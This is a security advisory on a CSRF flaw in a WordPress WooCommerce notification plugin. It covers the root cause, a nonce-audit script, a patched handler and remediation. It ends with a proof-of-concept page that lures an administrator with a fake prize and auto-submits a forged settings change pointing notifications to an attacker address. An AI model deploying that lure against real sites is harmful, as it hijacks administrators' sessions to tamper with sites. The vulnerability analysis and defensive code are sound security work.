Atomic Edge analysis of CVE-2026-1455 (metadata-based):
This vulnerability is a Cross-Site Request Forgery (CSRF) flaw in the Whatsiplus Scheduled Notification for Woocommerce WordPress plugin, versions up to and including 1.0.1. The vulnerability resides in the `wsnfw_save_users_settings` AJAX action handler. An attacker can exploit it to modify plugin configuration settings by forging a request that an already authenticated administrator's browser submits on the attacker's behalf; the attacker needs no credentials of their own.
Atomic Edge research indicates the root cause is missing nonce validation on the AJAX action handler. WordPress uses a nonce (a per-user, per-action token that stays valid for 12 to 24 hours, so not literally a "number used once") to prove that a request originated from a page the site rendered for that user. `admin-ajax.php` does not enforce this itself; each handler has to call `check_ajax_referer()` or `wp_verify_nonce()`. The plugin's handler, registered via the `wp_ajax_wsnfw_save_users_settings` hook, apparently does neither. This conclusion is inferred from the CWE-352 classification and the vulnerability description, which cites missing nonce validation; without the source code it remains a deduction from standard WordPress security patterns. A missing nonce check and a missing capability check (`current_user_can()`) are distinct defects: the former lets a third-party site act through a logged-in user's browser, the latter lets a low-privilege user call the action directly, and the advisory describes only the former.
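Because the root-cause statement is a deduction, the first thing a practitioner holding a copy of the plugin wants is to confirm it against the source. The following audit script is an added example written for this write-up, not Atomic Edge or plugin code: it lists every `wp_ajax_*` registration under a plugin directory and reports callbacks whose body never calls `check_ajax_referer()`, `wp_verify_nonce()` or `check_admin_referer()`, and separately whether the body contains a capability check. It is a heuristic: it resolves only string callbacks and only sees checks made directly in the handler, so anything it marks UNRESOLVED or MISSING still needs a manual look.

```php
<?php
// wp-ajax-nonce-audit.php: flag wp_ajax_* handlers with no direct nonce check.
// Added example, not part of any plugin. Heuristic, not a WordPress parser.
// Usage: php wp-ajax-nonce-audit.php /path/to/wp-content/plugins/some-plugin

const NONCE_CHECKS = ['check_ajax_referer', 'wp_verify_nonce', 'check_admin_referer'];
const CAP_CHECKS   = ['current_user_can', 'is_super_admin'];

/** Read every .php file below $dir into [path => source]. */
function load_plugin_sources(string $dir): array
{
    $sources = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($it as $file) {
        if ($file->isFile() && strtolower($file->getExtension()) === 'php') {
            $sources[$file->getPathname()] = file_get_contents($file->getPathname());
        }
    }
    return $sources;
}

/**
 * Find add_action('wp_ajax_<x>', <callback>) registrations.
 * Returns [hook => short callback name or null]; null means a closure, array
 * or method callback that this script does not resolve.
 */
function find_ajax_registrations(string $src): array
{
    $regs = [];
    $re = '/add_action\s*\(\s*[\'"](wp_ajax_(?:nopriv_)?[A-Za-z0-9_]+)[\'"]\s*,\s*(?:[\'"]([A-Za-z0-9_\\\\]+)[\'"])?/';
    preg_match_all($re, $src, $matches, PREG_SET_ORDER);
    foreach ($matches as $m) {
        // Strip any namespace prefix so the name matches the T_STRING after 'function'.
        $regs[$m[1]] = (isset($m[2]) && $m[2] !== '') ? substr(strrchr('\\' . $m[2], '\\'), 1) : null;
    }
    return $regs;
}

/** Return the brace-delimited body of the function named $name, or null. */
function function_body(string $src, string $name): ?string
{
    $tokens = token_get_all($src);
    $count  = count($tokens);
    for ($i = 0; $i < $count; $i++) {
        if (!is_array($tokens[$i]) || $tokens[$i][0] !== T_FUNCTION) {
            continue;
        }
        $j = $i + 1;                                   // skip whitespace before the name
        while ($j < $count && is_array($tokens[$j]) && $tokens[$j][0] === T_WHITESPACE) {
            $j++;
        }
        if ($j >= $count || !is_array($tokens[$j]) || $tokens[$j][0] !== T_STRING || $tokens[$j][1] !== $name) {
            continue;
        }
        // Tokens keep strings and comments whole, so braces inside them cannot unbalance us.
        $depth = 0;
        $body  = '';
        for ($k = $j; $k < $count; $k++) {
            $text = is_array($tokens[$k]) ? $tokens[$k][1] : $tokens[$k];
            if ($text === '{' || $text === '${') {     // plain brace or string-interpolation opener
                $depth++;
            }
            if ($depth > 0) {
                $body .= $text;
            }
            if ($text === '}' && --$depth === 0) {
                return $body;
            }
        }
    }
    return null;
}

/** True if $body contains a call to any function in $names. */
function has_call(string $body, array $names): bool
{
    foreach ($names as $fn) {
        if (preg_match('/\b' . preg_quote($fn, '/') . '\s*\(/', $body)) {
            return true;
        }
    }
    return false;
}

/** Audit one plugin directory; returns one finding per registered AJAX hook. */
function audit_plugin(string $dir): array
{
    $sources  = load_plugin_sources($dir);
    $findings = [];
    foreach ($sources as $path => $src) {
        foreach (find_ajax_registrations($src) as $hook => $callback) {
            $f = ['hook' => $hook, 'file' => $path, 'callback' => $callback];
            $body = null;
            if ($callback !== null) {
                foreach ($sources as $s) {             // the callback may live in another file
                    if (($body = function_body($s, $callback)) !== null) {
                        break;
                    }
                }
            }
            if ($body === null) {
                $f['status'] = 'UNRESOLVED (closure/method callback or function not found; inspect manually)';
            } else {
                $f['cap_check'] = has_call($body, CAP_CHECKS);
                $f['status']    = has_call($body, NONCE_CHECKS) ? 'OK' : 'MISSING NONCE CHECK (CSRF candidate)';
            }
            $findings[] = $f;
        }
    }
    return $findings;
}

if (PHP_SAPI === 'cli' && realpath($argv[0]) === __FILE__) {
    foreach (audit_plugin($argv[1] ?? '.') as $f) {
        printf("%-48s %-36s %s%s\n", $f['hook'], $f['callback'] ?? '(unresolved)', $f['status'],
            isset($f['cap_check']) && !$f['cap_check'] ? ' + no capability check' : '');
    }
}
```

Run it against the unpacked plugin; a line reading `wp_ajax_wsnfw_save_users_settings ... MISSING NONCE CHECK` confirms the deduction above, while `OK` on that hook means the check is present and the real defect lies elsewhere (for instance a nonce verified against the wrong action name, which this script cannot see).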
Exploitation requires an attacker to trick an authenticated administrator into submitting a forged request. The attack vector is a crafted HTML page that issues a POST request to the WordPress admin AJAX endpoint, `/wp-admin/admin-ajax.php`, carrying `action=wsnfw_save_users_settings` plus the plugin-specific parameters that control the configuration; the victim's browser attaches the WordPress authentication cookies, so the request arrives as the administrator. The attacker hosts the page on a separate domain and uses social engineering to get an administrator to open it; no click on the page itself is needed if the form is submitted by script. Two practical caveats: the WordPress auth cookies carry no `SameSite` attribute unless something on the site adds one, so browsers that default such cookies to `Lax` (Chromium does, with a two-minute exception for freshly set cookies on top-level POSTs) will withhold them from a cross-site POST and narrow the window; and because `admin-ajax.php` dispatches on `$_REQUEST['action']`, whether a GET-based trigger such as an image tag or link also works depends on whether the handler reads its parameters from `$_POST` or `$_REQUEST`, which is not known without the source.
Remediation requires adding nonce verification to the vulnerable AJAX handler. The plugin developer should modify the function handling `wsnfw_save_users_settings` to call `check_ajax_referer('nonce_action_name', 'nonce_field_name')` (which terminates the request on failure) or to check `wp_verify_nonce($_POST['_wpnonce'], 'nonce_action_name')` and bail out when it returns false. A matching nonce must be generated with `wp_create_nonce()` and delivered to the plugin's admin interface, either through `wp_nonce_field()` in a form or `wp_localize_script()` for the JavaScript that issues the AJAX call. The handler should also confirm `current_user_can('manage_options')` (or whatever capability the settings page requires), since `wp_ajax_` actions run for any logged-in user. This fix aligns with WordPress coding standards for securing AJAX endpoints.
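A before/after sketch of the handler, as an added example written for this write-up and not taken from the plugin. The action name is the one from the advisory; every other name (the two function names, the option key `wsnfw_users_settings`, the parameter names, the admin page hook suffix and the script handle) is an assumption about how such a handler is usually shaped.

```php
<?php
// Added example, not the plugin's source. Only the action name is known; the
// function names, option key, parameter names and hook suffix are assumptions.

// BEFORE (the shape CWE-352 implies): nothing ties the request to a page this
// site rendered, so a POST forged by another origin and carried by a logged-in
// administrator's browser reaches update_option().
function wsnfw_save_users_settings_vulnerable() {
    $settings = array(
        'notification_enabled' => !empty($_POST['notification_enabled']) ? 1 : 0,
        'recipient_list'       => sanitize_text_field(wp_unslash($_POST['recipient_list'] ?? '')),
        'message_template'     => sanitize_textarea_field(wp_unslash($_POST['message_template'] ?? '')),
    );
    update_option('wsnfw_users_settings', $settings);
    wp_send_json_success($settings);
}

// AFTER: check_ajax_referer() proves the request came from this site's admin UI
// for this user and ends the request (HTTP 400, body -1) when the nonce is
// absent, stale or minted for another action; the capability check stops
// lower-privileged logged-in users, which the nonce alone does not do.
function wsnfw_save_users_settings_secure() {
    check_ajax_referer('wsnfw_save_users_settings', 'nonce');
    if (!current_user_can('manage_options')) {
        wp_send_json_error(array('message' => 'Insufficient privileges.'), 403);
    }
    $settings = array(
        'notification_enabled' => !empty($_POST['notification_enabled']) ? 1 : 0,
        'recipient_list'       => sanitize_text_field(wp_unslash($_POST['recipient_list'] ?? '')),
        'message_template'     => sanitize_textarea_field(wp_unslash($_POST['message_template'] ?? '')),
    );
    update_option('wsnfw_users_settings', $settings);
    wp_send_json_success($settings);
}
add_action('wp_ajax_wsnfw_save_users_settings', 'wsnfw_save_users_settings_secure');

// The nonce has to reach the browser. Mint it server-side when the settings
// screen's script is enqueued and hand it to JavaScript; the script then posts
// { action: 'wsnfw_save_users_settings', nonce: wsnfwSettings.nonce, ... }
// to wsnfwSettings.ajaxUrl.
function wsnfw_enqueue_settings_script($hook_suffix) {
    if ($hook_suffix !== 'toplevel_page_wsnfw-settings') {   // assumed menu slug
        return;
    }
    wp_enqueue_script('wsnfw-settings', plugins_url('settings.js', __FILE__), array('jquery'), '1.0.2', true);
    wp_localize_script('wsnfw-settings', 'wsnfwSettings', array(
        'ajaxUrl' => admin_url('admin-ajax.php'),
        'nonce'   => wp_create_nonce('wsnfw_save_users_settings'),
    ));
}
add_action('admin_enqueue_scripts', 'wsnfw_enqueue_settings_script');

// For a plain <form> submit instead of JavaScript, emit the field in the page
// markup under the same action name and the same check above still applies:
//   wp_nonce_field('wsnfw_save_users_settings', 'nonce');
```

The action string passed to `wp_create_nonce()`, `wp_nonce_field()` and `check_ajax_referer()` must be identical; a handler that verifies a nonce minted for a different action is still a CSRF target, which is why the hardened version names the action once per site. Note that a nonce protects against a forged cross-site request but not against an attacker who can read the admin page (for example through XSS), since the token is then available to them for its whole validity window.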
Successful exploitation allows attackers to modify the plugin's configuration settings. The exact impact depends on what settings the `wsnfw_save_users_settings` action controls. Based on the plugin's purpose, scheduled WooCommerce notifications, attackers could alter notification templates, recipient lists, or scheduling parameters. This could lead to notification spam, data leakage via modified message content, or disruption of automated customer communications. The CVSS vector indicates low impact across confidentiality, integrity and availability, with the integrity impact limited to the plugin's settings.
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-1455 - Whatsiplus Scheduled Notification for Woocommerce <= 1.0.1 - Cross-Site Request Forgery to 'wsnfw_save_users_settings' AJAX Action
// (The opening PHP tag sits above this header so the comment block is parsed
// as PHP rather than echoed to the visitor as literal text.)
/**
 * Proof-of-Concept for CVE-2026-1455 (CSRF)
 * This script generates an HTML page that triggers a CSRF attack against the vulnerable AJAX endpoint.
 * Assumptions:
 * 1. The target WordPress site has the vulnerable plugin (<=1.0.1) installed.
 * 2. The attacker can lure an authenticated administrator to visit this page.
 * 3. The exact parameters for the 'wsnfw_save_users_settings' action are unknown; the hidden fields
 *    below (notification_enabled, recipient_list, message_template) are placeholders inferred from the
 *    plugin's purpose, not the plugin's real field names.
 * 4. The attack modifies plugin settings; what actually changes depends on the real parameter names,
 *    so the placeholders must be replaced after inspecting the plugin's admin page or source.
 */
$target_url = 'http://vulnerable-wordpress-site.com';
// Construct the AJAX endpoint URL and escape it for use in an HTML attribute
$ajax_url    = $target_url . '/wp-admin/admin-ajax.php';
$form_action = htmlspecialchars($ajax_url, ENT_QUOTES, 'UTF-8');

// Generate the malicious HTML page; $form_action is the only value interpolated into the heredoc
$html = <<<HTML
<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <title>Click to Claim Prize</title>
</head>
<body>
    <h1>You've Won a Prize!</h1>
    <p>Click the button below to claim your reward.</p>
    <!-- Hidden form that auto-submits via JavaScript; the visitor never has to click anything -->
    <form id="csrf_form" action="$form_action" method="POST">
        <input type="hidden" name="action" value="wsnfw_save_users_settings" />
        <!-- Assumed parameter names based on plugin functionality; replace with the real field names -->
        <input type="hidden" name="notification_enabled" value="0" />
        <input type="hidden" name="recipient_list" value="attacker@example.com" />
        <input type="hidden" name="message_template" value="Hacked by CSRF" />
    </form>
    <script>
        // Auto-submit the form after a short delay
        setTimeout(function() {
            document.getElementById('csrf_form').submit();
        }, 1000);
    </script>
</body>
</html>
HTML;

header('Content-Type: text/html; charset=utf-8');
echo $html;